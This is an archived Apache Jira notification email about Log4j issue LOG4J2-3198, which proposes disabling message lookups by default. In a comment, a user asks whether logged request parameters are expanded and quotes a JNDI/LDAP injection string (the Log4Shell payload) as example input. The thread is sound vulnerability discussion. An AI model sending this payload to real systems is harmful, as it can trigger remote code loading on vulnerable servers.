You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@logging.apache.org by "Eric Everman (Jira)" <ji...@apache.org> on 2021/12/10 18:01:00 UTC

[jira] [Comment Edited] (LOG4J2-3198) Message lookups should be disabled by default

    [ https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298 ] 

Eric Everman edited comment on LOG4J2-3198 at 12/10/21, 6:00 PM:
-----------------------------------------------------------------

Is there any possible configuration where the text of substituted parameters are substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??

 

Apparently the answer is 'yes', at least according to the [lunasec.io post on this vulnerability|https://www.lunasec.io/docs/blog/log4j-zero-day/].


was (Author: eeverman@usgs.gov):
Is there any possible configuration where the text of substituted parameters are substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs and implementation. Given a particular API, there's an expectation that a particular shape of call will result in specific results. However, lookups in messages can be passed into JUL and will result in resolved output in log4j formatted output, but not any other implementations despite no direct dependency on those implementations.
> There's also a cost to searching formatted message strings for particular escape sequences which define lookups. This feature is not used as far as we've been able to tell searching github and stackoverflow, so it's unnecessary for every log event in every application to burn several cpu cycles searching for the value.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)